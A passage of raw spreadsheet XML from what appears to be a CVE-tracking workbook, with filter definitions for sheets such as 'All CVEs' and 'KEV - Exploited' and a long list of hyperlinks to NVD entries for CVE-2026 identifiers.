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 name="Packages (GHSA-OSV)" sheetId="6" state="visible" r:id="rId6"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'All CVEs'!$A$1:$S$1101</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'KEV - Exploited'!$A$1:$S$11</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'Critical &amp; High'!$A$1:$S$586</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">'Watchlist'!$A$1:$S$78</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">'Packages (GHSA-OSV)'!$A$1:$S$58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86060" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58704" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67277" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42016" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42018" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76461" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84869" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85706" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87886" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14560" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80462" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82004" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87985" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87986" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87987" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87988" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19232" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65646" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66897" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14559" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14563" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21095" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21096" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52630" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53952" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62103" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62105" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63073" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69431" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71644" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77089" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77092" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77098" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78445" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79395" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79396" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79689" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79941" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80172" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80926" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80976" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80980" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80981" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80986" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81002" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82617" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84390" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86793" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8778" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89478" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89479" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89482" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89485" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89492" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89494" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89495" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89526" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89530" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89533" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89536" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89538" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89541" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89542" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89546" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89550" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89551" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89555" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89558" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89610" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89611" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89612" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89613" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89614" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89633" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89635" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89636" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89637" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89643" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89651" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89652" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89653" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89654" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89655" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89656" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89658" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89659" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89660" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89662" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89669" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89674" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89675" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89676" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89677" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89681" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89686" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89688" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89689" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89702" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89703" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89708" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89712" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81376" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11746" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38056" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61410" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82466" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86151" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54072" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72709" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72710" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80238" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87984" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89010" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89249" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89253" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89254" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89255" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89256" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89258" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89259" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89448" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3869" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47839" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54047" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87983" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89212" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89243" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90456" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57162" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57163" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73309" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73311" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73312" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75803" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80945" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89532" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89537" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89630" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89631" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89634" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89649" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89650" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89671" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89672" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89697" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89713" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69854" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11745" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12894" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21094" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41870" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62102" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62106" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62107" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69291" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71328" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71416" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72984" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73784" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77106" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77906" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78224" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 